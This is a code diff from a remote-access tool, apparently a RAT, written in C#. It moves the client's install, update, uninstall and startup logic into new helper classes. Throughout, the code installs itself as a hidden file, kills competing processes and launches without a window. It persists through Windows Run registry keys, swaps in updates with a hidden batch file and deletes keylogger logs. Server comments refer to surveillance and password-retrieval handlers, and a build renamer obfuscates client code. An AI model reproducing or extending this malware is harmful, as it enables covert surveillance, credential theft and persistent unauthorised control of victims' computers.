}
}
}
}

79
Client/Core/Helper/WindowsAccountHelper.cs Normal file
View File

@ -0,0 +1,79 @@
using System;
using System.Diagnostics;
using System.Security.Principal;
using System.Threading;
using xClient.Core.Data;
using xClient.Enums;
namespace xClient.Core.Helper
{
public static class WindowsAccountHelper
{
public static UserStatus LastUserStatus { get; set; }
public static string GetName()
{
return Environment.UserName;
}
public static string GetAccountType()
{
using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
{
if (identity != null)
{
WindowsPrincipal principal = new WindowsPrincipal(identity);
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
return "Admin";
if (principal.IsInRole(WindowsBuiltInRole.User))
return "User";
if (principal.IsInRole(WindowsBuiltInRole.Guest))
return "Guest";
}
}
return "Unknown";
}
public static void StartUserIdleCheckThread()
{
new Thread(UserIdleThread).Start();
}
static void UserIdleThread()
{
while (!ClientData.Disconnect)
{
Thread.Sleep(5000);
if (IsUserIdle())
{
if (LastUserStatus != UserStatus.Idle)
{
LastUserStatus = UserStatus.Idle;
new Packets.ClientPackets.SetUserStatus(LastUserStatus).Execute(Program.ConnectClient);
}
}
else
{
if (LastUserStatus != UserStatus.Active)
{
LastUserStatus = UserStatus.Active;
new Packets.ClientPackets.SetUserStatus(LastUserStatus).Execute(Program.ConnectClient);
}
}
}
}
static bool IsUserIdle()
{
long ticks = Stopwatch.GetTimestamp();
long idleTime = ticks - NativeMethodsHelper.GetLastInputInfoTickCount();
idleTime = ((idleTime > 0) ? (idleTime / 1000) : 0);
return (idleTime > 600); // idle for 10 minutes
}
}
}

80
Client/Core/Installation/ClientInstaller.cs Normal file
View File

@ -0,0 +1,80 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using xClient.Config;
using xClient.Core.Data;
using xClient.Core.Networking;
namespace xClient.Core.Installation
{
public static class ClientInstaller
{
public static void Install(Client client)
{
bool isKilled = false;
// create target dir
if (!Directory.Exists(Path.Combine(Settings.DIR, Settings.SUBFOLDER)))
Directory.CreateDirectory(Path.Combine(Settings.DIR, Settings.SUBFOLDER));
// delete existing file
if (File.Exists(ClientData.InstallPath))
{
try
{
File.Delete(ClientData.InstallPath);
}
catch (Exception ex)
{
if (ex is IOException || ex is UnauthorizedAccessException)
{
// kill old process if new mutex
Process[] foundProcesses =
Process.GetProcessesByName(Path.GetFileNameWithoutExtension(ClientData.InstallPath));
int myPid = Process.GetCurrentProcess().Id;
foreach (var prc in foundProcesses)
{
if (prc.Id == myPid) continue;
prc.Kill();
isKilled = true;
}
}
}
}
if (isKilled) Thread.Sleep(5000);
//copy client to target dir
File.Copy(ClientData.CurrentPath, ClientData.InstallPath, true);
if (Settings.STARTUP)
{
if (!Startup.AddToStartup())
ClientData.AddToStartupFailed = true;
}
if (Settings.HIDEFILE)
{
try
{
File.SetAttributes(ClientData.InstallPath, FileAttributes.Hidden);
}
catch
{
}
}
//start file
var startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = ClientData.InstallPath
};
Process.Start(startInfo);
ClientData.Disconnect = true;
}
}
}

62
Client/Core/Installation/ClientUninstaller.cs Normal file
View File

@ -0,0 +1,62 @@
using System.Diagnostics;
using System.IO;
using xClient.Config;
using xClient.Core.Data;
using xClient.Core.Helper;
using xClient.Core.Networking;
using xClient.Core.Utilities;
namespace xClient.Core.Installation
{
public static class ClientUninstaller
{
public static void Uninstall(Client client)
{
if (!Settings.INSTALL)
{
new Packets.ClientPackets.SetStatus("Can not uninstall client. Installation was not enabled.").Execute(client);
return;
}
RemoveExistingLogs();
if (Settings.STARTUP)
Startup.RemoveFromStartup();
try
{
string batchFile = FileHelper.CreateUninstallBatch(Settings.HIDEFILE);
if (string.IsNullOrEmpty(batchFile)) return;
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = batchFile
};
Process.Start(startInfo);
}
finally
{
ClientData.Disconnect = true;
client.Disconnect();
}
}
public static void RemoveExistingLogs()
{
if (Directory.Exists(Keylogger.LogDirectory)) // try to delete Logs from Keylogger
{
try
{
Directory.Delete(Keylogger.LogDirectory, true);
}
catch
{
}
}
}
}
}

49
Client/Core/Installation/ClientUpdater.cs Normal file
View File

@ -0,0 +1,49 @@
using System;
using System.Diagnostics;
using System.IO;
using xClient.Config;
using xClient.Core.Data;
using xClient.Core.Helper;
using xClient.Core.Networking;
using xClient.Core.Utilities;
namespace xClient.Core.Installation
{
public static class ClientUpdater
{
public static void Update(Client c, string newFilePath)
{
try
{
FileHelper.DeleteZoneIdentifier(newFilePath);
var bytes = File.ReadAllBytes(newFilePath);
if (bytes[0] != 'M' && bytes[1] != 'Z')
throw new Exception("no pe file");
string batchFile = FileHelper.CreateUpdateBatch(newFilePath, Settings.INSTALL && Settings.HIDEFILE);
if (string.IsNullOrEmpty(batchFile)) throw new Exception("Could not create update batch file.");
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = batchFile
};
Process.Start(startInfo);
ClientData.Disconnect = true;
if (Settings.INSTALL && Settings.STARTUP)
Startup.RemoveFromStartup();
c.Disconnect();
}
catch (Exception ex)
{
NativeMethods.DeleteFile(newFilePath);
new Packets.ClientPackets.SetStatus(string.Format("Update failed: {0}", ex.Message)).Execute(c);
}
}
}
}

48
Client/Core/Installation/Startup.cs Normal file
View File

@ -0,0 +1,48 @@
using Microsoft.Win32;
using xClient.Config;
using xClient.Core.Data;
using xClient.Core.Helper;
namespace xClient.Core.Installation
{
public static class Startup
{
public static bool AddToStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
bool success = RegistryKeyHelper.AddRegistryKeyValue(Registry.LocalMachine,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath);
if (success) return true;
return RegistryKeyHelper.AddRegistryKeyValue(Registry.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath);
}
else
{
return RegistryKeyHelper.AddRegistryKeyValue(Registry.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY, ClientData.CurrentPath);
}
}
public static bool RemoveFromStartup()
{
if (WindowsAccountHelper.GetAccountType() == "Admin")
{
bool success = RegistryKeyHelper.DeleteRegistryKeyValue(Registry.LocalMachine,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY);
if (success) return true;
return RegistryKeyHelper.DeleteRegistryKeyValue(Registry.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY);
}
else
{
return RegistryKeyHelper.DeleteRegistryKeyValue(Registry.CurrentUser,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", Settings.STARTUPKEY);
}
}
}
}

564
Client/Core/SystemCore.cs
View File

@ -1,564 +0,0 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net.NetworkInformation;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using Microsoft.Win32;
using xClient.Config;
using xClient.Core.Encryption;
using xClient.Core.Extensions;
using xClient.Core.Helper;
using xClient.Core.Networking;
using xClient.Core.Utilities;
using xClient.Enums;
namespace xClient.Core
{
public static class SystemCore
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool DeleteFile(string name);
[DllImport("user32.dll")]
private static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);
[StructLayout(LayoutKind.Sequential)]
private struct LASTINPUTINFO
{
public static readonly int SizeOf = Marshal.SizeOf(typeof(LASTINPUTINFO));
[MarshalAs(UnmanagedType.U4)]
public UInt32 cbSize;
[MarshalAs(UnmanagedType.U4)]
public UInt32 dwTime;
}
public static UserStatus LastStatus { get; set; }
public static bool Disconnect { get; set; } // when Disconnect is true, stop all running threads
public static string OperatingSystem { get; set; }
public static string MyPath { get; set; }
public static string InstallPath { get; set; }
public static string AccountType { get; set; }
public static string GetOperatingSystem()
{
return string.Format("{0} {1} Bit", PlatformHelper.Name, PlatformHelper.Architecture);
}
public static string GetAccountType()
{
using (WindowsIdentity identity = WindowsIdentity.GetCurrent())
{
if (identity != null)
{
WindowsPrincipal principal = new WindowsPrincipal(identity);
if (principal.IsInRole(WindowsBuiltInRole.Administrator))
return "Admin";
if (principal.IsInRole(WindowsBuiltInRole.User))
return "User";
if (principal.IsInRole(WindowsBuiltInRole.Guest))
return "Guest";
}
}
return "Unknown";
}
public static string GetId()
{
return SHA256.ComputeHash(GetMacAddress());
}
public static string GetCpu()
{
try
{
string cpuName = string.Empty;
string query = "SELECT * FROM Win32_Processor";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("root\\CIMV2", query))
{
foreach (ManagementObject mObject in searcher.Get())
{
cpuName = mObject["Name"].ToString() + "; ";
}
}
cpuName = FormatHelper.RemoveEnd(cpuName);
return (!string.IsNullOrEmpty(cpuName)) ? cpuName : "N/A";
}
catch
{
}
return "Unknown";
}
public static int GetRam()
{
try
{
int installedRAM = 0;
string query = "Select * From Win32_ComputerSystem";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
double bytes = (Convert.ToDouble(mObject["TotalPhysicalMemory"]));
installedRAM = (int) (bytes/1048576);
}
}
return installedRAM;
}
catch
{
return -1;
}
}
public static string GetGpu()
{
try
{
string gpuName = string.Empty;
string query = "SELECT * FROM Win32_DisplayConfiguration";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
{
foreach (ManagementObject mObject in searcher.Get())
{
gpuName = mObject["Description"].ToString() + "; ";
}
}
gpuName = FormatHelper.RemoveEnd(gpuName);
return (!string.IsNullOrEmpty(gpuName)) ? gpuName : "N/A";
}
catch
{
return "Unknown";
}
}
public static string GetAntivirus()
{
try
{
string antivirusName = string.Empty;
// starting with Windows Vista we must use the root\SecurityCenter2 namespace
string scope = (PlatformHelper.VistaOrHigher) ? "root\\SecurityCenter2" : "root\\SecurityCenter";
string query = "SELECT * FROM AntivirusProduct";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
{
foreach (ManagementObject mObject in searcher.Get())
{
antivirusName = mObject["displayName"].ToString() + "; ";
}
}
antivirusName = FormatHelper.RemoveEnd(antivirusName);
return (!string.IsNullOrEmpty(antivirusName)) ? antivirusName : "N/A";
}
catch
{
return "Unknown";
}
}
public static string GetFirewall()
{
try
{
string firewallName = string.Empty;
// starting with Windows Vista we must use the root\SecurityCenter2 namespace
string scope = (PlatformHelper.VistaOrHigher) ? "root\\SecurityCenter2" : "root\\SecurityCenter";
string query = "SELECT * FROM FirewallProduct";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
{
foreach (ManagementObject mObject in searcher.Get())
{
firewallName = mObject["displayName"].ToString() + "; ";
}
}
firewallName = FormatHelper.RemoveEnd(firewallName);
return (!string.IsNullOrEmpty(firewallName)) ? firewallName : "N/A";
}
catch
{
return "Unknown";
}
}
public static string GetUptime()
{
long ticks = Stopwatch.GetTimestamp();
double uptime = ((double)ticks) / Stopwatch.Frequency;
var uptimeSpan = TimeSpan.FromSeconds(uptime);
return string.Format("{0}d : {1}h : {2}m : {3}s", uptimeSpan.Days, uptimeSpan.Hours, uptimeSpan.Minutes, uptimeSpan.Seconds);
}
public static string GetUsername()
{
return Environment.UserName;
}
public static string GetPcName()
{
return Environment.MachineName;
}
public static string GetLanIp()
{
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
ni.OperationalStatus == OperationalStatus.Up)
{
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
continue;
return ip.Address.ToString();
}
}
}
return "-";
}
public static string GetMacAddress()
{
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 ||
ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet &&
ni.OperationalStatus == OperationalStatus.Up)
{
bool foundCorrect = false;
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily != AddressFamily.InterNetwork ||
ip.AddressPreferredLifetime == UInt32.MaxValue) // exclude virtual network addresses
continue;
foundCorrect = (ip.Address.ToString() == GetLanIp());
}
if (foundCorrect)
return FormatHelper.FormatMacAddress(ni.GetPhysicalAddress().ToString());
}
}
return "-";
}
public static bool CreateMutex(ref Mutex mutex)
{
bool createdNew;
mutex = new Mutex(false, Settings.MUTEX, out createdNew);
return createdNew;
}
public static void UserIdleThread()
{
while (!Disconnect)
{
Thread.Sleep(5000);
if (IsUserIdle())
{
if (LastStatus != UserStatus.Idle)
{
LastStatus = UserStatus.Idle;
new Packets.ClientPackets.SetUserStatus(LastStatus).Execute(Program.ConnectClient);
}
}
else
{
if (LastStatus != UserStatus.Active)
{
LastStatus = UserStatus.Active;
new Packets.ClientPackets.SetUserStatus(LastStatus).Execute(Program.ConnectClient);
}
}
}
}
private static bool IsUserIdle()
{
uint idleTime = 0;
LASTINPUTINFO lastInputInfo = new LASTINPUTINFO();
lastInputInfo.cbSize = (uint) Marshal.SizeOf(lastInputInfo);
lastInputInfo.dwTime = 0;
uint envTicks = (uint) Environment.TickCount;
if (GetLastInputInfo(ref lastInputInfo))
{
uint lastInputTick = lastInputInfo.dwTime;
idleTime = envTicks - lastInputTick;
}
idleTime = ((idleTime > 0) ? (idleTime/1000) : 0);
return (idleTime > 600); // idle for 10 minutes
}
public static void AddToStartup()
{
if (Settings.STARTUP)
{
if (AccountType == "Admin")
{
try // try LocalMachine
{
using (
RegistryKey key =
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key == null) throw new Exception();
key.SetValue(Settings.STARTUPKEY, InstallPath);
key.Close();
}
}
catch // if fails use CurrentUser
{
try
{
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe(
"Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key == null) throw new Exception();
key.SetValue(Settings.STARTUPKEY, InstallPath);
key.Close();
}
}
catch
{
}
}
}
else
{
try
{
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key == null) throw new Exception();
key.SetValue(Settings.STARTUPKEY, InstallPath);
key.Close();
}
}
catch
{
}
}
}
}
public static void RemoveFromStartup()
{
if (Settings.STARTUP)
{
if (AccountType == "Admin")
{
try
{
using (
RegistryKey key =
Registry.LocalMachine.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
catch
{
// try deleting from Registry.CurrentUser
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
}
else
{
try
{
using (
RegistryKey key =
Registry.CurrentUser.OpenWritableSubKeySafe("Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
{
if (key != null)
{
key.DeleteValue(Settings.STARTUPKEY, false);
key.Close();
}
}
}
catch
{
}
}
}
}
public static void Install(bool addToStartup = true)
{
bool isKilled = false;
// create target dir
if (!Directory.Exists(Path.Combine(Settings.DIR, Settings.SUBFOLDER)))
Directory.CreateDirectory(Path.Combine(Settings.DIR, Settings.SUBFOLDER));
// delete existing file
if (File.Exists(InstallPath))
{
try
{
File.Delete(InstallPath);
}
catch (Exception ex)
{
if (ex is IOException || ex is UnauthorizedAccessException)
{
// kill old process if new mutex
Process[] foundProcesses =
Process.GetProcessesByName(Path.GetFileNameWithoutExtension(InstallPath));
int myPid = Process.GetCurrentProcess().Id;
foreach (var prc in foundProcesses)
{
if (prc.Id == myPid) continue;
prc.Kill();
isKilled = true;
}
}
}
}
if (isKilled) Thread.Sleep(5000);
//copy client to target dir
File.Copy(MyPath, InstallPath, true);
if (addToStartup)
AddToStartup();
if (Settings.HIDEFILE)
{
try
{
File.SetAttributes(InstallPath, FileAttributes.Hidden);
}
catch
{
}
}
//start file
var startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = InstallPath
};
Process.Start(startInfo);
Disconnect = true;
}
public static void UpdateClient(Client c, string newFile)
{
try
{
DeleteFile(newFile + ":Zone.Identifier");
var bytes = File.ReadAllBytes(newFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
throw new Exception("no pe file");
string filename = Path.Combine(
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
FileHelper.GetRandomFilename(12, ".bat"));
string uninstallBatch = (Settings.INSTALL && Settings.HIDEFILE)
? "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del /A:H " + "\"" + MyPath + "\"" + "\n" +
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
"del " + "\"" + filename + "\""
: "@echo off" + "\n" +
"echo DONT CLOSE THIS WINDOW!" + "\n" +
"ping -n 20 localhost > nul" + "\n" +
"del " + "\"" + MyPath + "\"" + "\n" +
"move " + "\"" + newFile + "\"" + " " + "\"" + MyPath + "\"" + "\n" +
"start \"\" " + "\"" + MyPath + "\"" + "\n" +
"del " + "\"" + filename + "\""
;
File.WriteAllText(filename, uninstallBatch);
ProcessStartInfo startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
UseShellExecute = true,
FileName = filename
};
Process.Start(startInfo);
Disconnect = true;
c.Disconnect();
RemoveTraces();
}
catch (Exception ex)
{
DeleteFile(newFile);
new Packets.ClientPackets.SetStatus(string.Format("Update failed: {0}", ex.Message)).Execute(c);
}
}
public static void RemoveTraces()
{
RemoveFromStartup();
if (Directory.Exists(Keylogger.LogDirectory)) // try to delete Logs from Keylogger
{
try
{
Directory.Delete(Keylogger.LogDirectory, true);
}
catch
{
}
}
}
}
}

3
Client/Core/Utilities/Keylogger.cs
View File

@ -4,6 +4,7 @@ using System.Diagnostics;
using System.IO;
using System.Text;
using System.Windows.Forms;
using xClient.Core.Data;
using xClient.Core.Helper;
using xClient.Core.MouseKeyHook;
using Timer = System.Timers.Timer;
@ -236,7 +237,7 @@ namespace xClient.Core.Utilities
private void timerFlush_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{
if (_logFileBuffer.Length > 0 && !SystemCore.Disconnect)
if (_logFileBuffer.Length > 0 && !ClientData.Disconnect)
WriteFile();
}

14
Client/Core/Utilities/NativeMethods.cs
View File

@ -1,5 +1,6 @@
using System;
using System.Runtime.InteropServices;
using xClient.Core.Helper;
namespace xClient.Core.Utilities
{
@ -8,6 +9,16 @@ namespace xClient.Core.Utilities
/// </summary>
public static class NativeMethods
{
[StructLayout(LayoutKind.Sequential)]
public struct LASTINPUTINFO
{
public static readonly int SizeOf = Marshal.SizeOf(typeof(LASTINPUTINFO));
[MarshalAs(UnmanagedType.U4)]
public UInt32 cbSize;
[MarshalAs(UnmanagedType.U4)]
public UInt32 dwTime;
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool DeleteFile(string name);
@ -29,6 +40,9 @@ namespace xClient.Core.Utilities
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
[DllImport("user32.dll")]
public static extern bool GetLastInputInfo(ref LASTINPUTINFO plii);
[DllImport("user32.dll")]
public static extern bool SetCursorPos(int x, int y);

57
Client/Program.cs
View File

@ -4,11 +4,11 @@ using System.IO;
using System.Threading;
using System.Windows.Forms;
using xClient.Config;
using xClient.Core;
using xClient.Core.Commands;
using xClient.Core.Data;
using xClient.Core.Encryption;
using xClient.Core.Helper;
using xClient.Core.Installation;
using xClient.Core.Networking;
using xClient.Core.Packets;
using xClient.Core.Utilities;
@ -20,7 +20,6 @@ namespace xClient
public static Client ConnectClient;
private static bool _reconnect = true;
private static volatile bool _connected = false;
private static Mutex _appMutex;
private static ApplicationContext _msgLoop;
private static HostsManager _hosts;
@ -32,7 +31,7 @@ namespace xClient
Settings.Initialize();
Initialize();
if (!SystemCore.Disconnect)
if (!ClientData.Disconnect)
Connect();
Cleanup();
@ -47,8 +46,7 @@ namespace xClient
Keylogger.Instance.Dispose();
if (_msgLoop != null)
_msgLoop.ExitThread();
if (_appMutex != null)
_appMutex.Close();
MutexHelper.CloseMutex();
}
private static void InitializeClient()
@ -120,25 +118,23 @@ namespace xClient
AES.PreHashKey(Settings.PASSWORD);
_hosts = new HostsManager(HostHelper.GetHostsList(Settings.HOSTS));
SystemCore.OperatingSystem = SystemCore.GetOperatingSystem();
SystemCore.MyPath = Application.ExecutablePath;
SystemCore.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
SystemCore.AccountType = SystemCore.GetAccountType();
ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();
if (!Settings.INSTALL || SystemCore.MyPath == SystemCore.InstallPath)
if (!MutexHelper.CreateMutex(Settings.MUTEX))
ClientData.Disconnect = true;
if (ClientData.Disconnect)
return;
if (!Settings.INSTALL || ClientData.CurrentPath == ClientData.InstallPath)
{
if (!SystemCore.CreateMutex(ref _appMutex))
SystemCore.Disconnect = true;
if (SystemCore.Disconnect)
return;
new Thread(SystemCore.UserIdleThread).Start();
WindowsAccountHelper.StartUserIdleCheckThread();
if (Settings.STARTUP && Settings.INSTALL)
{
SystemCore.AddToStartup();
if (!Startup.AddToStartup())
ClientData.AddToStartupFailed = true;
}
InitializeClient();
@ -150,24 +146,19 @@ namespace xClient
_msgLoop = new ApplicationContext();
Keylogger logger = new Keylogger(15000);
Application.Run(_msgLoop);
}).Start(); ;
}).Start();
}
}
else
{
if (!SystemCore.CreateMutex(ref _appMutex))
SystemCore.Disconnect = true;
if (SystemCore.Disconnect)
return;
SystemCore.Install();
MutexHelper.CloseMutex();
ClientInstaller.Install(ConnectClient);
}
}
private static void Connect()
{
while (_reconnect && !SystemCore.Disconnect)
while (_reconnect && !ClientData.Disconnect)
{
if (!_connected)
{
@ -188,7 +179,7 @@ namespace xClient
Thread.Sleep(2500);
}
if (SystemCore.Disconnect)
if (ClientData.Disconnect)
{
ConnectClient.Disconnect();
return;
@ -203,7 +194,7 @@ namespace xClient
if (reconnect)
CommandHandler.CloseShell();
else
SystemCore.Disconnect = true;
ClientData.Disconnect = true;
ConnectClient.Disconnect();
}
@ -214,14 +205,14 @@ namespace xClient
private static void ClientState(Client client, bool connected)
{
if (connected && !SystemCore.Disconnect)
if (connected && !ClientData.Disconnect)
_reconnect = true;
else if (!connected && SystemCore.Disconnect)
else if (!connected && ClientData.Disconnect)
_reconnect = false;
else
_reconnect = !SystemCore.Disconnect;
_reconnect = !ClientData.Disconnect;
if (_connected != connected && !connected && _reconnect && !SystemCore.Disconnect)
if (_connected != connected && !connected && _reconnect && !ClientData.Disconnect)
LostConnection();
_connected = connected;

3
Server/Core/Build/Renamer.cs
View File

@ -56,8 +56,7 @@ namespace xServer.Core.Build
private void RenameInType(TypeDefinition typeDef)
{
if (typeDef.Namespace == "xClient.Core"
|| typeDef.Namespace.StartsWith("xClient.Core.Elevation")
if (typeDef.Namespace.StartsWith("xClient.Core.Elevation")
|| typeDef.Namespace.StartsWith("xClient.Core.Compression")
|| typeDef.Namespace.StartsWith("xClient.Core.Networking")
|| typeDef.Namespace.StartsWith("xClient.Core.NetSerializer")

2
Server/Core/Commands/ConnectionHandler.cs
View File

@ -8,7 +8,7 @@ using xServer.Forms;
namespace xServer.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT MANIPULATE THE CONNECTION. */
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE CONNECTION COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetAuthenticationResponse(Client client, GetAuthenticationResponse packet)

2
Server/Core/Commands/SurveillanceHandler.cs
View File

@ -11,7 +11,7 @@ using xServer.Core.Utilities;
namespace xServer.Core.Commands
{
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT ARE USED FOR SURVEILLANCE. */
/* THIS PARTIAL CLASS SHOULD CONTAIN METHODS THAT HANDLE SURVEILLANCE COMMANDS. */
public static partial class CommandHandler
{
public static void HandleGetPasswordsResponse(Client client, GetPasswordsResponse packet)